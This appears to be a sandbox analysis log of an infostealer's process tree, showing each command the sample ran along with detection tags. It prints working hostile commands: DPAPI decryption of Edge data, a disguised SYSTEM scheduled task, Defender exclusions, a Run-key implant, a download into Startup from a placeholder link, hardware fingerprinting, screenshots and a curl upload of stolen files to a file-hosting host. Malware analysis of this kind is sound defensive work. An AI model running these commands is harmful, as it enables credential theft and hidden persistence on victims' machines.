C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,123,210,181,210,198,217,30,79,143,44,142,139,125,65,164,21,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,169,185,211,78,126,178,233,113,146,165,226,217,166,46,54,58,7,126,2,46,52,51,8,33,165,252,252,33,23,55,170,117,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,17,11,201,141,126,201,93,71,249,169,78,142,80,33,175,239,206,207,106,1,120,226,109,40,148,210,70,217,136,37,103,93,48,0,0,0,196,143,154,93,178,189,8,54,194,213,193,83,116,53,243,111,111,77,200,213,127,10,114,6,231,115,160,210,133,174,254,89,248,212,39,71,125,70,83,162,94,87,174,78,120,53,111,193,64,0,0,0,230,177,176,152,136,15,179,107,163,31,172,7,147,247,157,248,126,206,103,252,231,212,64,164,231,127,156,232,77,46,46,112,8,236,160,141,113,40,61,129,30,155,244,246,72,26,227,154,16,181,136,68,101,194,90,66,46,20,238,131,114,189,199,162), $null, 'CurrentUser')"
2⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
PID:744

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,123,210,181,210,198,217,30,79,143,44,142,139,125,65,164,21,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,169,185,211,78,126,178,233,113,146,165,226,217,166,46,54,58,7,126,2,46,52,51,8,33,165,252,252,33,23,55,170,117,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,17,11,201,141,126,201,93,71,249,169,78,142,80,33,175,239,206,207,106,1,120,226,109,40,148,210,70,217,136,37,103,93,48,0,0,0,196,143,154,93,178,189,8,54,194,213,193,83,116,53,243,111,111,77,200,213,127,10,114,6,231,115,160,210,133,174,254,89,248,212,39,71,125,70,83,162,94,87,174,78,120,53,111,193,64,0,0,0,230,177,176,152,136,15,179,107,163,31,172,7,147,247,157,248,126,206,103,252,231,212,64,164,231,127,156,232,77,46,46,112,8,236,160,141,113,40,61,129,30,155,244,246,72,26,227,154,16,181,136,68,101,194,90,66,46,20,238,131,114,189,199,162), $null, 'CurrentUser')
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2304

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
2⤵
- Suspicious use of WriteProcessMemory
PID:2676

C:\Windows\System32\Wbem\WMIC.exe
wmic diskdrive get serialnumber
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1800

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f"
2⤵
- Suspicious use of WriteProcessMemory
PID:3608

C:\Windows\system32\reg.exe
reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f
3⤵
PID:4876

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM"
2⤵
- Suspicious use of WriteProcessMemory
PID:3912

C:\Windows\system32\schtasks.exe
schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM
3⤵
- Creates scheduled task(s)
PID:1344

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1""
2⤵
- Suspicious use of WriteProcessMemory
PID:2300

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1"
3⤵
- Command and Scripting Interpreter: PowerShell
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5096

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ssclitig\ssclitig.cmdline"
4⤵
PID:4576

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6002.tmp" "c:\Users\Admin\AppData\Local\Temp\ssclitig\CSC61902E2AE09C45598977E3F7F876E6C7.TMP"
5⤵
PID:4648

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
2⤵
- Suspicious use of WriteProcessMemory
PID:3780

C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3844

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs""
2⤵
- Suspicious use of WriteProcessMemory
PID:4528

C:\Windows\system32\cscript.exe
cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs"
3⤵
- Checks computer location settings
PID:3956

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat" "
4⤵
PID:2316

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4288

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows"
5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4312

C:\Windows\system32\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\PlutoBETA.2\PlutoBETA.exe" /f
5⤵
- Adds Run key to start application
- Modifies registry key
PID:1776

C:\Windows\system32\reg.exe
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam"
5⤵
- Modifies registry key
PID:3976

C:\Windows\system32\curl.exe
curl -o "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Steam_Service.exe" YOUR-BINDED-EXE-LINK-HERE
5⤵
PID:4388

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
2⤵
- Suspicious use of WriteProcessMemory
PID:1720

C:\Windows\System32\Wbem\WMIC.exe
wmic baseboard get serialnumber
3⤵
PID:4636

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
2⤵
- Suspicious use of WriteProcessMemory
PID:4348

C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
3⤵
PID:3924

C:\Windows\system32\find.exe
find /i "Speed"
3⤵
PID:4544

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"
2⤵
PID:2844

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_computersystemproduct get uuid
3⤵
PID:1988

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
2⤵
PID:2548

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
3⤵
- Detects videocard installed
PID:2688

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController GET Description,PNPDeviceID"
2⤵
PID:4524

C:\Windows\System32\Wbem\WMIC.exe
wmic PATH Win32_VideoController GET Description,PNPDeviceID
3⤵
PID:4844

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
2⤵
PID:4676

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4452

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber"
2⤵
PID:3628

C:\Windows\System32\Wbem\WMIC.exe
wmic memorychip get serialnumber
3⤵
PID:4172

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
2⤵
PID:3712

C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
3⤵
PID:636

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"
2⤵
PID:968

C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
3⤵
PID:2804

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get processorid"
2⤵
PID:2676

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get processorid
3⤵
PID:3844

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
2⤵
PID:832

C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
3⤵
PID:884

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "getmac /NH"
2⤵
PID:4120

C:\Windows\system32\getmac.exe
getmac /NH
3⤵
PID:708

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
2⤵
PID:696

C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
3⤵
PID:4544

C:\Windows\system32\find.exe
find /i "Speed"
3⤵
PID:2188

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
2⤵
PID:4348

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
3⤵
- Detects videocard installed
PID:1420

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
2⤵
PID:4892

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2196

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
2⤵
PID:1052

C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
3⤵
PID:4172

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
2⤵
PID:872

C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
3⤵
PID:612

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
2⤵
PID:4144

C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
3⤵
PID:1592

C:\Windows\system32\find.exe
find /i "Speed"
3⤵
PID:3372

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
2⤵
PID:3832

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
3⤵
- Detects videocard installed
PID:2804

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
2⤵
PID:3624

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3712

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
2⤵
PID:2976

C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
3⤵
PID:4908

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
2⤵
PID:3920

C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
3⤵
PID:4312

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
2⤵
PID:2516

C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
3⤵
PID:4544

C:\Windows\system32\find.exe
find /i "Speed"
3⤵
PID:564

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
2⤵
PID:2844

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
3⤵
- Detects videocard installed
PID:1628

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
2⤵
PID:4348

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3576

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1""
2⤵
PID:4380

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1"
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3668

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Bvrkipts.zip";"
2⤵
PID:1724

C:\Windows\system32\curl.exe
curl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Bvrkipts.zip";
3⤵
PID:1908

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
2⤵
PID:2240

C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
3⤵
PID:4808

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
2⤵
PID:2724

C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
3⤵
PID:2808

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
2⤵
PID:1848

C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
3⤵
PID:4996

C:\Windows\system32\find.exe
find /i "Speed"
3⤵
PID:3844

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
2⤵
PID:468

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
3⤵
- Detects videocard installed
PID:4392

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
2⤵
PID:2972

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4388

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
2⤵
PID:404

C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
3⤵
PID:2516

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
2⤵
PID:4784

C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
3⤵
PID:2876

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
2⤵
PID:4452

C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
3⤵
PID:2044

C:\Windows\system32\find.exe
find /i "Speed"
3⤵
PID:4856

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
2⤵
PID:4620

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
3⤵
- Detects videocard installed
PID:3504

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
2⤵
PID:4232

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4648

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
2⤵
PID:4772

C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
3⤵
PID:4456

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "rmdir /s /q "C:/ProgramData/Steam/Launcher""
2⤵
PID:2308

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
2⤵
PID:3912

C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
3⤵
PID:4660

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
2⤵
PID:1556

C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
3⤵
PID:216

C:\Windows\system32\find.exe
find /i "Speed"
3⤵
PID:4288

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
2⤵
PID:3384

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
3⤵
- Detects videocard installed
PID:1436

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
2⤵
PID:5008

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4304

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
2⤵
PID:1596

C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
3⤵
PID:2316

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
2⤵
PID:4272

C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
3⤵
PID:4872

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
2⤵
PID:2972

C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
3⤵
PID:1420

C:\Windows\system32\find.exe
find /i "Speed"
3⤵
PID:4148

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
2⤵
PID:2812

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
3⤵
- Detects videocard installed
PID:744

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
2⤵
PID:3040

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2408

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
2⤵
PID:2832

C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
3⤵
PID:4016

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
2⤵
PID:3612

C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
3⤵
PID:1464

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
2⤵
PID:3628

C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
3⤵
PID:968

C:\Windows\system32\find.exe
find /i "Speed"
3⤵
PID:2000

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
2⤵
PID:5032

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
3⤵
- Detects videocard installed
PID:740

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
2⤵
PID:2808

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2676

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
2⤵
PID:4040

C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
3⤵
PID:3384

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
2⤵
PID:3192

C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
3⤵
PID:3852

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
2⤵
PID:4392

C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
3⤵
PID:4576

C:\Windows\system32\find.exe
find /i "Speed"
3⤵
PID:5088

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
2⤵
PID:1552

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
3⤵
- Detects videocard installed
PID:3760

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
2⤵
PID:3920

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3904

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
2⤵
PID:1628

C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
3⤵
PID:744

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
2⤵
PID:4844

C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
3⤵
PID:2296

C:\Windows\system32\cscript.EXE
C:\Windows\system32\cscript.EXE //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs
1⤵
- Modifies data under HKEY_USERS
PID:4464

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat" "
2⤵
PID:3612

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath "C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1500

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath "C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows"
3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:2076

C:\Windows\system32\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\PlutoBETA.2\PlutoBETA.exe" /f
3⤵
- Modifies registry key
PID:3288

C:\Windows\system32\reg.exe
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam"
3⤵
- Modifies registry key
PID:4524

C:\Windows\system32\curl.exe
curl -o "C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Steam_Service.exe" YOUR-BINDED-EXE-LINK-HERE
3⤵
PID:4364

C:\Windows\system32\cscript.EXE
C:\Windows\system32\cscript.EXE //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs
1⤵
PID:4448

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat" "
2⤵
PID:1592

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath "C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:3816

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath "C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows"
3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:3656

C:\Windows\system32\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\PlutoBETA.2\PlutoBETA.exe" /f
3⤵
- Modifies registry key
PID:4584

C:\Windows\system32\reg.exe
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam"
3⤵
- Modifies registry key
PID:2712

C:\Windows\system32\curl.exe
curl -o "C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Steam_Service.exe" YOUR-BINDED-EXE-LINK-HERE
3⤵
PID:2000

C:\Windows\system32\cscript.EXE
C:\Windows\system32\cscript.EXE //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs
1⤵
PID:752

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat" "
2⤵
PID:948

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath "C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:232

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath "C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows"
3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:3744

C:\Windows\system32\reg.exe
